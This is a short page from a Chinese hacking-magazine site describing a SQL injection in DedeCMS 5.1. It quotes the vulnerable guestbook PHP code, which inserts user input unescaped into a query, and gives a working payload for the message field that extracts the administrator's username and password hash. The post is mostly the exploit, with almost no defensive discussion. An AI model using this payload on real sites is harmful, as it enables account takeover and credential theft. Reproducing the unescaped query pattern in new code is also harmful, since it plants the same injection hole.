黑客防线,在攻与防的对立统一中寻求突破!2001年创刊的黑客技术专业刊物!
plant

设为首页
收藏本站
联系我们
网站导航
黑客文章 - 数据库注入 - 浏览 - dedecms5.1注入

dedecms5.1注入

黑客 发布日期:2010-3-5 10:34:37 共有 967 人次浏览
dedecms5.1注入
member_guestbook_action.php

$title = cn_substr(html2text($title),60);
$msg = cn_substr(stripslashes($msg),2048);
if($cfg_ml->M_UserName!="" && $cfg_ml->M_ID!=$uidnum) $gid = $cfg_ml->M_UserName;
else  $gid = '';

$inquery = "
   INSERT INTO #@__member_guestbook(mid,gid,title,msg,uname,email,qq,tel,ip,dtime)
   VALUES ('$uidnum','$gid','$title','$msg','$uname','$email','$qq','$tel','".GetIP()."',".mytime().");
";
一般的注射..
cn_substr在别处有别的错.这里无所谓了.

空间留言:
cccccc',(select concat(userid,0x3a,pwd) from #@__admin limit 0,1),'','','','123',123)#

by jackal
所属分类: 数据库注入     网摘收藏: Google 雅虎 百度 POCO 365key 和讯 天极
相关黑客文章
黑客文章搜索
最新黑客文章
 
 

版权所有 黑客防线 廊(公)备13100138000530号